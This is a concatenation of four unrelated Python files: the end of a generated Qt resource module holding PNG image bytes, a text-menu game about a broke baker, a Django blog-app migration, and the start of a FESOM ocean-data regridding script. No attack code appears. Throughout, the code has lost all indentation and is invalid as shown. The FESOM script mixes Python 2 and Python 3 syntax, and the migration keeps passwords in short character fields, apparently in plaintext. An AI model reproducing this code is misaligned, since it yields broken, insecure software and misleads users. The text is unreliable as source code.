\x54\x25\x3a\x2a\x6f\xc1\x59\xcb\x66\xea\xdc\x1d\x58\x18\x74\xd0\
\x07\x6a\x27\x41\x69\x8c\x94\x21\x8f\x30\x90\x1a\x92\x9c\xdf\x5c\
\x1b\xef\x43\x78\xdd\x2a\xa8\xc9\xc5\xc4\x65\x92\x07\x18\x09\xb6\
\xa2\x33\xd4\xb6\xb1\x05\x6b\xed\x84\x5d\x56\x0a\x4c\x32\x00\xc0\
\x3a\x0f\xaa\xc6\x90\xfc\x9c\xcd\x03\x38\x11\x20\xd7\xb1\x80\x03\
\x42\x90\x71\xbd\x17\xfe\xbc\xd0\x71\x6e\x2e\x7b\x03\x2e\xdd\x4d\
\xe4\x83\x00\x34\x80\xb1\x74\x08\xc4\xaf\x43\xe4\x80\x6b\x05\x5c\
\x12\x84\xca\xae\x8e\x2f\xe9\x84\x90\xcb\xde\x9d\x92\x33\x44\xe9\
\xa0\x85\x24\xb0\x86\x43\x52\x12\xdc\xd5\x88\xc1\x6b\x74\xa3\x83\
\x14\x22\x54\x60\x50\x13\xbd\x04\xbe\xee\x83\xf9\xdb\x4d\x16\xdb\
\x80\xc3\x5e\x68\xbe\xd5\xd1\xa1\x69\x10\x1a\x69\xef\xf2\x7a\xe0\
\xd8\x0b\x31\x98\x52\x03\xae\x3f\xec\x33\xa8\xf0\x91\x7a\xc8\x2e\
\xa4\xc5\xd1\x69\x01\x3d\x7f\x04\x4e\x7b\x9c\x73\xaa\xb2\xd3\xcd\
\xf0\xd5\xb4\x7d\xd0\x48\x3c\x03\x8c\x4f\x81\xf6\x5c\xe0\x24\x06\
\xeb\x60\xfa\xff\xa0\x17\x50\x59\x07\xfc\x66\x7b\xf0\xdc\xd3\xb6\
\xb5\xca\xe9\xc0\xc7\x5e\x52\xc1\x16\xe1\x8f\x53\xed\xbd\xc9\x59\
\x4c\x8e\xf1\x23\x7e\x5c\x00\x24\xe2\x82\xce\xcb\x70\xd5\xbe\xc8\
\xbc\x20\x50\x09\x1c\x48\x80\xd6\x12\xd8\x3d\x1c\x0e\xe6\xdb\x4b\
\x31\x80\xb2\x64\x68\xba\x06\x7a\x8c\x6b\x23\x3a\xa0\x82\xf8\x8c\
\x08\x47\xc7\x42\xb3\xdb\x5e\xb2\xdf\xb6\x87\xe4\x1b\xe0\x2b\x8b\
\x42\xc3\x29\x48\xaa\x80\xd1\x95\x04\xdf\x0b\x53\x57\x0c\x1e\x13\
\x12\xf7\x00\x3f\xb9\x81\x1d\x90\xf6\x13\xfc\xb7\xda\x86\xf3\x91\
\x20\x1c\xfc\x1d\xac\x13\x70\xd9\x2f\x30\x0a\x70\x45\xe1\xfb\x10\
\x1e\x26\x03\x6d\x18\xfe\x15\x50\xd0\x08\xa5\x11\x4c\xef\x1a\x5c\
\x15\xd3\xa9\x26\x8b\x0c\x3c\x64\xf0\x2b\xc6\x34\xa1\x98\xd3\xe7\
\x25\x0e\x54\x5a\x1c\x93\x5d\xef\xc0\x26\xc1\x69\xe6\xae\x4e\x4b\
\xfe\x95\xef\xb3\x9d\xbe\xf8\x2b\xb8\x02\x0c\x88\x43\x5e\x04\x9a\
\x0c\x30\x3d\x90\x64\x42\xd0\x70\xd2\x6b\x1c\x5c\x07\xc0\xac\xb0\
\xe1\x6b\x0d\x00\xb3\xd5\x89\xd4\x01\x87\x92\xba\x3b\x8b\x71\x3b\
\xff\x6f\xea\x03\x4d\x1d\x30\xa4\x1a\x4e\x5a\xf6\xae\xf5\x07\x56\
\x26\x13\xab\x7e\x04\x77\x47\x0d\x78\xb7\x62\xfc\xd3\x42\x27\x0d\
\xe8\x16\x87\x87\x4f\x42\x61\x1d\x94\xf7\x87\x25\xe9\x7f\x99\x67\
\x18\xdb\x09\x17\x1e\x06\x6f\x1d\xb8\x9b\x0c\x4e\x8d\x16\x47\xbb\
\xc2\x19\xd3\x2e\x22\x0b\x28\x8c\x83\xab\x0d\x7a\x1d\x36\x71\x9d\
\x4e\xa2\xa3\x28\x08\xfd\xe2\x18\xc9\xd0\x6a\x40\x72\x04\x32\x0f\
\x01\x6d\x2e\xf0\x5a\x90\x21\xac\xae\x60\x76\x02\x27\x9c\x23\x6d\
\x72\x6e\x17\x9a\x9c\x4b\xfa\x46\x03\x12\x65\x53\xe3\x28\xc7\x9d\
\x1e\x73\x12\x60\x93\x09\xcd\x16\x04\x4d\xc8\xb3\x60\x53\x1b\x9a\
\x25\xd4\xf4\x15\x52\x96\x7d\x4d\x1a\x5e\x63\xcf\x3c\x1e\x93\x2d\
\x8e\xd6\xbd\x48\x45\x09\x92\xbb\xc4\xf6\x59\x29\xdd\xd5\xf2\xab\
\xa1\xaf\x85\xde\x77\x66\x23\xed\xfb\x90\x6e\x47\x32\x06\x4b\x3c\
\x27\x71\x97\x74\x5e\x9a\xac\x16\xd4\x20\x64\x1d\x40\xea\x9f\x2e\
\x31\x47\xe2\x6a\xe9\x46\xaf\x62\x6d\xce\xe5\x76\x7e\x77\x7b\x4e\
\x92\x3b\xda\xbe\x1f\x5e\x89\x74\xa5\x5f\x62\xae\x7d\xb5\x6a\x3c\
\x29\xbd\xe8\x91\xe6\x23\x3d\x85\xd4\xbb\x44\x31\x96\xa9\x99\xcd\
\x8a\xf1\x95\x94\x3b\x52\xee\x9e\x31\xbb\xd8\x8c\x97\x80\xc6\x5c\
\x68\xac\xa3\x35\xdf\x6e\xde\x5e\xc0\xf4\x27\xc1\x58\xdc\x17\xac\
\x73\x1c\x00\x45\xb0\x6e\x69\xe4\x8f\xc1\xc2\x72\xfa\x23\x82\x1d\
\x1a\x39\x05\x28\xc5\x01\x5e\x21\xec\xbd\x15\xe3\xb1\x77\xf1\x2c\
\x0a\x63\xd4\x00\x87\x46\x3b\x1e\x6c\x34\x7c\xeb\xc7\xf5\xaf\x4f\
\xed\xd3\xa8\x79\x9d\x18\x93\x70\xd7\x1d\x83\xdd\x83\xa0\xc0\x24\
\xb6\x6e\x31\x01\x6e\xc6\x04\x92\x38\x82\xcb\x5c\x08\x66\x14\xd6\
\x16\x51\x5b\xbe\x8d\x72\x32\xd8\x88\x97\x29\x40\xbf\xba\x7d\x98\
\x0d\x09\x10\x6f\x05\x8e\x02\x9e\x10\xc4\x60\x67\xa9\x9d\xfd\xaf\
\xde\x0d\xe6\x4a\x0f\x58\x3d\x1d\x90\x95\x13\x9b\xf6\x2d\x1f\xbd\
\x15\xe4\x88\xdf\x2e\xa0\x15\x38\x0b\x1c\x2f\x82\xd0\x5c\xa0\xf0\
\x57\x60\x9d\xcd\x63\x1a\x0a\xcb\x06\xd0\x50\x01\x91\x81\x40\xce\
\x61\xe7\x39\xb9\xd0\x39\xc8\xc6\x6e\x04\xc0\xc0\xcd\x69\x3b\x68\
\xe5\x00\x47\x52\x69\x89\x5e\x4e\x10\x48\x21\x88\xcb\x58\x08\xbe\
\x00\x6c\x01\xf6\x3e\x41\x2d\xb9\x44\xf1\x60\x81\x9d\x11\x93\xca\
\x31\xb7\xba\xe1\x82\x9f\x81\x02\x03\xa2\x99\x30\x14\x0e\xa4\xc0\
\x13\xc7\x21\x7b\x01\x70\x36\xcb\x09\x43\x89\xc4\x1f\x28\x63\xe1\
\x0a\x9b\xc9\x32\x9d\x30\xd5\xd5\xe9\x91\x46\xe0\xc4\x18\xd0\x83\
\x16\x78\xea\x1c\x21\x1c\x04\xa1\xfb\xc8\x9e\x9f\x41\x4d\x1e\xc4\
\x5e\x39\xee\xa4\xc2\x5c\xb0\xfa\x40\xb5\xcb\xce\x57\xb6\x94\xdb\
\x91\x36\x06\xd6\xc2\x4b\x39\xa1\x1c\x2a\x00\x11\x81\x0b\xde\x82\
\xad\x49\xc4\xbf\x7c\x93\x0e\x6e\x64\x37\x06\xb5\x18\x40\x9c\xae\
\xfc\x06\xe1\x2d\x98\x3b\x3c\x50\xb2\x1a\x88\x09\x12\x5a\x38\x36\
\x0b\xfa\x06\xa0\xe7\x5c\xe7\xc6\xa6\x3d\x13\xcc\x3f\x61\xc6\x87\
\xbc\x30\x3f\x42\xa6\x63\x2e\x52\x9d\x1b\x9b\x06\x87\xb5\xf2\x1d\
\xf2\x39\x3b\x1b\x98\x71\x04\xdb\x17\xec\x06\x7a\x90\xba\x60\x22\
\x5d\x57\x83\x31\x59\x90\xfe\x81\x8d\x41\x2b\x1b\xfe\xf4\xdb\x4d\
\x4e\x93\xc3\x8b\x95\x50\x0b\x66\xe7\x20\xba\x63\x51\x08\x98\xb9\
\x0f\xc3\x40\x37\xd6\xca\x77\xe8\xe0\x16\xc2\x24\x72\x35\x01\x7a\
\x02\x73\xdc\xaf\xe2\x4e\x9a\x00\xd9\x41\x38\xf8\x2b\xd2\x30\xa4\
\x41\x48\x2f\xdb\x01\xa9\x7d\x09\xd2\x40\xaf\xe4\x2a\x92\xe8\xa7\
\xce\xfb\x0d\xbd\x1e\x43\xcb\x85\x2a\xcb\x50\xe0\x15\x14\x7e\xd3\
\xd0\xd7\x16\xfa\xde\x42\x91\xcf\x91\x35\x07\x35\x6f\x40\xe5\x42\
\x2d\x9d\xc8\x7a\xd0\x70\x02\xd8\x42\x89\xb7\xa5\x82\x0b\x14\xd9\
\x87\x34\x0b\x89\xc5\xf6\x08\xe1\xda\x22\xbb\xb1\x79\x59\xe2\x4f\
\xc9\x7b\x8b\xf4\x3c\xb2\x78\x4d\x47\x88\xab\x95\x93\xd2\x2d\x48\
\x09\x97\xc9\xa2\x5a\xe2\xa8\xe2\x74\xd8\x73\x94\x84\x71\xd2\x84\
\x54\x29\xad\x44\x1a\x93\x22\x1a\xd7\x20\x8d\xb0\x67\x22\x95\xb5\
\xa8\x7a\x1f\x52\xae\xcb\x59\xc4\x20\xb5\x5d\xe3\xd5\x8f\xad\x68\
\x6f\x33\x0a\xbf\x66\x48\x05\xc9\x12\x57\x4a\xfe\x21\xaa\x2c\x47\
\x3b\x9a\x91\x8a\x0d\xc9\xb8\x44\x72\x4f\x53\xec\xfe\x02\x55\x34\
\x22\xeb\x30\xd2\xa4\x44\xc9\x78\xca\x19\xf6\xcc\x97\x86\x95\x48\
\xfb\x90\x0a\xa6\x48\xfc\x20\x79\x2f\x96\x16\xe3\x4c\xbc\xbe\x92\
\xce\x19\x2e\xcd\xec\xa9\x38\x47\xd5\x4e\x4c\x56\xef\xbb\xa4\xe1\
\xdd\x24\xbe\x51\x05\x71\xd5\x10\x57\x98\xbd\xd2\xe8\x3e\xd2\xb9\
\x1e\x69\x58\x9a\x94\xf0\x90\x4e\x25\xaf\x11\x81\xa9\xd9\xd2\x3f\
\x3c\x6a\x6d\x41\x3f\xcb\xa1\xd0\xc4\x04\xc9\x3f\x48\xb1\xaf\xd0\
\x1c\xa1\xc6\xdf\x4c\xa9\xb7\x47\xa2\x54\xe2\x42\x89\xfb\xa4\xa4\
\x73\xb4\xa6\x02\xad\x6e\x41\xea\xe6\x93\xb8\xd5\x99\x0d\xfe\x4b\
\xea\x31\x5c\xf1\x5f\x91\x75\x10\xe9\xbc\x14\x27\xc6\xbe\x69\x9f\
\xc4\x7d\x49\xd2\x55\x99\x4e\xbc\x9d\x2a\x3d\x89\xc4\x74\x89\xf7\
\xa5\x31\xbd\xa5\xae\x97\x49\xac\x52\x88\x36\xa9\x47\x81\xfd\x3a\
\x35\x8a\x52\x27\xb1\x5c\x16\x6f\x48\x4f\xa1\x78\xca\x75\x6a\x4a\
\x78\x49\x35\x74\x68\x8e\x4b\x42\x59\x3e\x59\xef\xa1\xda\x00\x8a\
\x4f\x4f\x96\x28\x96\xae\x40\xc1\xfd\xf6\x04\x2a\xb0\x14\xc9\x3f\
\xde\x59\xe8\x34\x89\x4b\xa4\x94\x6e\xaa\x5d\x6a\xea\x45\xa1\x2f\
\x2c\x64\x6d\x41\x2a\xcd\x75\xf4\xe3\x11\x89\xd5\x92\xeb\x7d\xe9\
\xd2\x54\xe9\x17\xa4\x61\x45\x12\x1f\x4a\x54\x2a\xc6\x46\x29\x6d\
\x8c\xc4\x9b\xb2\x58\x2b\xa5\xa7\x39\x8b\x3d\x29\x75\x4f\x56\x94\
\xb5\x3a\x4c\x4c\x01\x0e\x4a\xc6\x33\x8a\xd2\xa4\x38\x01\x1d\x24\
\xa6\xf6\xb1\xcb\xa4\xf3\x5d\x8a\xe6\x4e\x51\x1d\x3f\xeb\x3b\xa4\
\xd5\xc4\xf4\x11\x12\xf1\xcf\x91\x1e\x47\x9a\x99\x2d\xe5\xf8\xa5\
\x2b\x4c\xe9\x5b\x54\x17\x45\xd6\x03\x6e\xc9\xdf\x5d\xe2\x5c\x7b\
\x66\xe8\xc9\x97\xae\x34\xf4\xe9\x09\x7b\x28\xba\x4a\x68\xb1\xd0\
\xd9\x16\xd4\xbc\x1d\xe9\x2a\xbf\xc4\x15\x12\xf3\xd5\x4a\xab\x2c\
\x8e\x4b\xb9\x23\xa5\x67\x90\xae\x2a\x94\x58\xa9\x06\xa4\x20\x4b\
\xed\xcb\x0b\xf6\x4a\xbc\xab\x38\xfb\x55\x81\x65\x4f\x79\xf9\x46\
\xed\x04\x74\x9a\x6a\x1d\x24\xa4\xad\x48\x11\x3a\x15\x34\x7f\x94\
\xdc\x53\x15\x49\xdd\xab\x36\xef\xef\xfa\xa2\xf0\xa0\x16\x76\x3d\
\xa2\x08\xeb\x74\x77\x9e\xe4\x9a\xdb\x9f\x79\xc6\xda\x14\xd8\x38\
\x19\x92\x8f\xc1\xe8\x30\xd1\x2b\x0d\x52\x9e\xea\x86\xf1\x45\x02\
\x14\x89\xc8\x05\x89\x54\xbd\xb8\x8f\xa5\x8f\x07\xf8\xfc\x21\xe1\
\xca\xb0\xc5\x32\xd9\x21\xcd\xfa\x20\x44\x4a\x81\x1b\xa2\xf8\x87\
\x9f\x80\xd0\x16\x12\x2a\x4f\x41\xd4\x87\xd1\x31\x02\xca\x2c\x22\
\xb3\x77\x11\x9d\xba\x12\xef\xba\x18\x66\x74\x24\xee\x3e\x9f\x41\
\x53\x00\xb8\x80\x28\x25\xf8\x68\xc6\x4b\x39\x71\xd2\x30\xc8\xe6\
\x77\xba\x10\x26\xca\x20\x76\xe1\x3f\x6f\x01\xee\xd0\x49\xde\xf0\
\xcd\x23\xd2\x69\xb1\xc2\x5f\xcc\x65\x9d\xd5\x84\x5b\x45\xa3\xbf\
\x81\x98\x75\x02\xde\xdf\x79\x95\x46\x6d\x7b\x4f\xd7\x1c\x9a\xad\
\xc0\x2f\x48\x2f\x21\x8d\xf4\x48\x5d\x8b\xa4\x3b\x0d\x35\x1c\xb2\
\x73\xfa\x1b\x16\xda\xd8\x89\x82\xb5\xa8\xea\x18\x7a\xc1\x42\xcf\
\x0b\xad\x13\xfa\x3d\x8c\xe2\x9b\x0d\x75\x9c\x34\xa4\xa3\xc8\x6a\
\xb4\x19\x50\x05\xdd\x25\x63\x92\xc4\x08\x89\x19\xd2\xf8\x02\xe9\
\xff\x21\x79\xee\x90\x8c\xcf\x25\xe3\x4a\xbb\x7f\x8c\x6a\xc9\x78\
\x47\x32\x26\x48\xac\x90\xd8\xa7\xbd\x48\x11\x9e\x95\xd8\xa9\x72\
\xa2\xb2\x58\xa7\x36\x0e\x4a\x2c\xd7\x7a\xb3\x5c\xa1\xae\x77\xa9\
\xf9\xfa\xb1\xba\xb6\xfc\x2e\x69\xd0\x10\x19\x0d\x7c\xab\xe5\x13\
\x5d\xdc\x64\x3e\x40\xda\xaf\x03\xc0\xbf\x0e\xba\x75\xf2\xf5\xe7\
\xa2\xc7\x06\x38\x5a\x6b\x32\xfe\x50\x1a\x19\xd5\x51\x68\x4f\x83\
\x84\x28\xd4\xd6\xd1\xf9\x3c\x6c\x19\x0f\x7d\x2c\xe8\xfe\x0a\xb8\
\xde\x99\x02\x6d\x57\x41\xe6\x87\x90\xe1\x42\x97\x54\x41\x71\x19\
\x9d\x57\x99\xf8\xdf\x4b\x41\x8b\x2e\x27\x16\xbe\x06\x4f\xc6\x6b\
\xe0\xa9\x85\xba\xc7\x61\xf8\xbb\x70\x32\x8c\x96\xb5\x12\x49\x08\
\xe2\x5b\x1e\x82\x77\xee\x21\xce\x2d\x1c\xa2\x3b\x3d\x88\x62\xb2\
\x95\xdd\x5c\xc6\xf9\x9e\x8d\xec\x1b\xf8\x15\xc5\x5d\x8a\xd9\xfc\
\xfd\x97\x4c\xce\x3c\x97\xfd\xf7\x1f\xa7\xab\xd9\x40\xc3\x2b\xb7\
\x61\xac\xfc\x3d\x41\x57\x7f\xdf\xdd\x1e\xe6\xac\x05\x4a\x4c\xea\
\x17\x59\x64\xee\xcb\xc1\x35\x0f\x38\xde\x1d\x54\x04\xf4\x71\xc2\
\xcf\x20\x3b\x00\x4d\x3a\x49\xfd\xe7\x65\xac\x4f\x86\x1b\xde\x05\
\xe3\x89\x31\xc4\x9b\x5f\x76\xac\x6c\x22\x2e\x8e\x41\xff\x77\xed\
\xbc\x9f\x93\x83\x36\x8e\xc2\xe0\x12\x3a\xb8\x80\x24\xbe\xb0\x83\
\xd7\xcd\x4b\x09\x2f\x81\x76\x13\x52\x0c\xf0\xec\x01\xf3\x43\xe0\
\xb7\xf1\x54\xec\xfb\x37\xf9\xb1\x12\x02\x34\x93\xe9\xdf\x0d\xe6\
\xd7\x90\x60\xc1\xed\x2b\xa8\x5e\xf7\x22\x4b\x0a\x07\x91\x5b\xe6\
\xa1\x3c\x2d\xc6\x4b\x67\x42\xb8\xae\x6e\x7e\x73\x5e\x72\xaf\x6d\
\xa4\xbf\xdf\x1b\x7a\xf9\x61\xdb\x34\x92\x7e\x18\x86\xf9\x51\x09\
\x34\x8c\x04\xa6\xdb\x73\x0c\x8e\x42\xd1\x01\xc8\xfc\x9e\xc8\xa4\
\xa3\x54\x4e\x6f\x64\x76\x29\xdc\x0e\x64\xee\x04\xea\xea\x31\x6b\
\x4e\x60\x5a\x51\x4c\xd7\x6f\xa0\x6e\x50\x6f\x40\xdd\x5d\x58\xa7\
\xfb\x62\x5a\x3e\xc4\x4c\x0c\xd2\x70\xf1\x7f\xd0\x77\x33\x9c\x13\
\xc4\x5d\x0f\xfe\x3a\x70\x6f\x07\xe3\xb8\xe3\x6c\x7a\x54\x91\xbe\
\x25\x9b\x5d\x4c\x22\x89\x8d\x24\x45\x0b\x68\x8d\x9c\x8f\x72\xf7\
\xd1\xb2\xeb\x72\x9a\xae\xf6\xb0\x6a\xfd\x9d\x7c\xf8\xa4\xc1\x23\
\xef\x1c\xa4\xa5\x7d\x0a\xff\x1f\xa7\x48\xb3\x27\x67\x17\xe2\x1e\
\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
"
qt_resource_name = b"\
\x00\x05\
\x00\x73\x5e\x63\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\x00\x73\
\x00\x08\
\x0a\x61\x5a\xa7\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x74\x20\x97\x84\xbd\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
|
"""Padeiro pobre precisa de ajuda para começar a ganhar dinheiro.
Ele precisa conseguir uma grana para comprar massas para produzir pão.
Com massa ele pode ir à padaria, fazer e vender pães.
Ele poderá pedir esmola na rua.
Pode pedir esmola para a mãe.
"""
from random import uniform
from random import randint
class Padeiro:
def __init__(self, nome, idade, dinheiro):
self.nome = nome
self.idade = idade
self.dinheiro = float(dinheiro)
self.massa = 0
self.exp = 1.0
self.repetir = True
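# Economy: dough costs R$ 10.00 apiece at the market, while a loaf sells for
# roughly R$ 8.20-9.60 plus exp / 5, so gaining experience (e.g. from the
# mother's tips) is what eventually makes baking profitable.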
def trabalhar(self):
x = 0
fabricar = input('\tHow many loaves do you want to bake?\n\t') # TODO: validate input
try:
fabricar = int(fabricar)
if fabricar > self.massa:
print('\tYou do not have enough dough for that quantity.')
elif fabricar == 0:
print('\tThat is unprofessional; when you come to work, bring everything you need.')
else:
self.massa -= fabricar
self.exp += uniform(0.2, 1)
while x < fabricar:
p = uniform(8.2, 9.6) + (self.exp / 5)
print('\t\tLoaf baked and sold for R$ {:.2f}.'.format(p))
self.dinheiro += p
x += 1
except ValueError:
print('*Only whole numbers are valid.')
self.menu()
def superm(self):
print('\tWelcome to the Dough Market.')
compra = input('\tTell us how many batches of dough you want to buy: ')
try:
compra = int(compra)
preco = compra * 10
if self.dinheiro < preco:
print('\nOops, you do not have enough money.\nEach one costs R$ 10.00.')
elif compra == 0:
print('Come back soon! But do not waste my time!')
else:
self.massa += compra
self.dinheiro -= preco
print('Thank you for your purchase, come back soon!')
except ValueError:
print('*Only whole numbers are valid.')
self.menu()
# def imprimir(self):
# print('The baker is named {}, he is {} years old and started with {} reais.'
# .format(self.nome,self.idade,self.dinheiro))
def imprimir_din(self):
print('{} has R$ {:.2f}.'.format(self.nome, self.dinheiro))
self.menu()
def mae(self):
print('\nGood to see you. It is always rewarding to welcome a son home.')
print('I can help you with baking tips. If I have a few coins, I can give you some.')
esmola = uniform(0.05, 0.5)
aprend = randint(1, 16)
if aprend == 10 and self.dinheiro > 5:
assalto = uniform(0.3, 0.6)
sub = self.dinheiro * assalto
aprendizado = (aprend / 55) * uniform(1, 1.8)
self.dinheiro -= sub
print('Your mother is broke! She took R$ {:.2f} from you!'.format(sub))
self.exp += aprendizado
print('In return, she taught you a great deal.')
elif aprend == 5 or aprend == 6:
aprendizado = (aprend / 55) * uniform(1, 1.4)
self.dinheiro += esmola
self.exp += aprendizado
print('{} gains R$ {:.2f}.'.format(self.nome, esmola))
print('And gains {:.2f} experience.'.format(aprendizado))
else:
self.dinheiro += esmola
print('{} gains R$ {:.2f}.'.format(self.nome, esmola))
self.menu()
def esmola(self):
esmola = uniform(0.1, 2.5)
p_exp = uniform(0.01, 0.1)
sorte = randint(1,15)
if sorte == 10 and self.dinheiro > 5:
assalto = uniform(0.3, 0.5)
sub = self.dinheiro * assalto
self.dinheiro -= sub
print('You were robbed! They took R$ {:.2f}.'.format(sub))
elif self.exp > 1:
self.dinheiro += esmola
self.exp -= p_exp
print('\nBegging makes me feel unmotivated; I will end up losing my skills.')
print('{} spends the whole day begging and gets R$ {:.2f}, but loses {:.2f} experience.'
.format(self.nome, esmola, p_exp))
else:
self.dinheiro += esmola
print('\nBegging makes me feel unmotivated; my situation is very sad.')
print('{} spends the whole day begging and gets R$ {:.2f}.'.format(self.nome, esmola))
self.menu()
def menu(self):
print('\nSkill: {:.2f}, R$ {:.2f}, dough: {}.'.format(self.exp, self.dinheiro, self.massa))
print('\n\tHelp {} make a decision.'
.format(self.nome))
print('\tActions:')
esc = input('\t\t1 - Go to work.'
'\n\t\t2 - Go to the supermarket.'
"\n\t\t3 - Visit mother's house."
'\n\t\t4 - Beg for alms.'
'\n\t\t5 - Quit.\n')
try:
esc = int(esc)
if esc == 1:
self.trabalhar()
elif esc == 2:
self.superm()
elif esc == 3:
self.mae()
elif esc == 4:
self.esmola()
elif esc == 5:
self.repetir = False
else:
print('*Choose a number between 1 and 5.')
except ValueError:
print('*Choose a number between 1 and 5.')
self.menu()
def home():
print()
print('\tHi, our baker friend needs help. Good thing you came!')
print('\tHe is unemployed and broke, and needs some guidance.')
print('\tThere is a way to get him earning money. Find it.')
input('\n\n\t Press "enter" to start!')
produtos = ['cake', 'bread', 'corn bread', 'ring bread', 'cookie']
valores = [5, 0.10, 0.5, 6, 1]
prod = dict(zip(produtos, valores))
padeiro = Padeiro('Jucinaldo', 32, 0) # create the baker
while padeiro.repetir:
home()
padeiro.menu()
input('Press "enter" to close.')
|
# Generated by Django 2.2 on 2019-06-30 06:44
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Admin',
fields=[
('admin_id', models.BigAutoField(primary_key=True, serialize=False)),
('password', models.CharField(max_length=16)),
],
options={
'db_table': 'Admin',
},
),
migrations.CreateModel(
name='Blog',
fields=[
('blog_id', models.BigAutoField(primary_key=True, serialize=False)),
('content', models.TextField()),
('title', models.CharField(max_length=100)),
('view_num', models.IntegerField()),
('like_num', models.IntegerField()),
('create_time', models.DateTimeField()),
('modified_time', models.DateTimeField()),
],
options={
'db_table': 'Blog',
},
),
migrations.CreateModel(
name='Category',
fields=[
('cate_id', models.BigAutoField(primary_key=True, serialize=False)),
('cate_name', models.CharField(max_length=40)),
],
options={
'db_table': 'Category',
},
),
migrations.CreateModel(
name='Tag',
fields=[
('tag_id', models.BigAutoField(primary_key=True, serialize=False)),
('tag_name', models.CharField(max_length=40)),
],
options={
'db_table': 'Tag',
},
),
migrations.CreateModel(
name='User',
fields=[
('user_id', models.BigAutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=40)),
('nickname', models.CharField(max_length=40)),
('password', models.CharField(max_length=16)),
('regist_time', models.DateTimeField()),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('description', models.CharField(blank=True, max_length=100, null=True)),
('image_height', models.PositiveIntegerField(blank=True, default=100, editable=False, null=True)),
('image_width', models.PositiveIntegerField(blank=True, default=100, editable=False, null=True)),
('avatar', models.ImageField(blank=True, height_field='image_height', null=True, upload_to='Img/avatar/', width_field='image_width')),
],
options={
'db_table': 'User',
},
),
migrations.CreateModel(
name='Notification',
fields=[
('noti_id', models.BigAutoField(primary_key=True, serialize=False)),
('content', models.CharField(max_length=400)),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User')),
],
options={
'db_table': 'Notification',
},
),
migrations.CreateModel(
name='Follow',
fields=[
('follow_id', models.BigAutoField(primary_key=True, serialize=False)),
('fld_user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='followers', to='blogApp.User')),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='follows', to='blogApp.User')),
],
options={
'db_table': 'Follow',
},
),
migrations.CreateModel(
name='Favourite',
fields=[
('favourite_id', models.BigAutoField(primary_key=True, serialize=False)),
('blog_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Blog')),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User')),
],
options={
'db_table': 'Favourite',
},
),
migrations.CreateModel(
name='Cookie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cookie', models.CharField(max_length=20)),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User')),
],
options={
'db_table': 'Cookie',
},
),
migrations.CreateModel(
name='Comment',
fields=[
('comment_id', models.BigAutoField(primary_key=True, serialize=False)),
('content', models.CharField(max_length=600)),
('time', models.DateTimeField()),
('blog_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Blog')),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User')),
],
options={
'db_table': 'Comment',
},
),
migrations.CreateModel(
name='BlogTag',
fields=[
('blog_tag_id', models.BigAutoField(primary_key=True, serialize=False)),
('blog_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Blog')),
('tag_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Tag')),
],
options={
'db_table': 'BlogTag',
},
),
migrations.AddField(
model_name='blog',
name='cate_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.Category'),
),
migrations.AddField(
model_name='blog',
name='user_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blogApp.User'),
),
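# Raw SQL to start the auto-increment counters at friendlier IDs;
# note that this ALTER TABLE syntax is MySQL-specific.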
migrations.RunSQL('alter table User auto_increment = 100000'),
migrations.RunSQL('alter table Admin auto_increment = 10000'),
]
|
# This file is part of fesom_viz
#
################################################################################
#
# Interpolates FESOM data to a regular grid. The output is netCDF4 files
# with CMOR-compliant attributes.
#
# Original code by Nikolay Koldunov, 2016
#
# TODO:
# Add possibility to define curvilinear grid.
# Add ESMPy as regridding tool.
# Find official CMOR descriptions for some of the variables
# Modifications:
#
################################################################################
import sys
try:
import configparser as ConfigParser  # Python 3
except ImportError:
import ConfigParser  # Python 2
from netCDF4 import Dataset, num2date
import numpy as np
import json
from collections import OrderedDict
import os
import datetime
# Read configuration file
try:
config_file = sys.argv[1]
except:
print "You have to provide configuration file. Example config located in \"./configs/fesom2geo_example\""
sys.exit(1)
import multiprocessing as mp
config = ConfigParser.RawConfigParser()
config.read(config_file)
# There is an option to provide path to the pyfesom folder
pfpath = config.get('main', 'pfpath')
sys.path.append(pfpath)
import pyfesom as pf
# Read options from the configuration file. See fesom2geo_example for
# explanations and possible values.
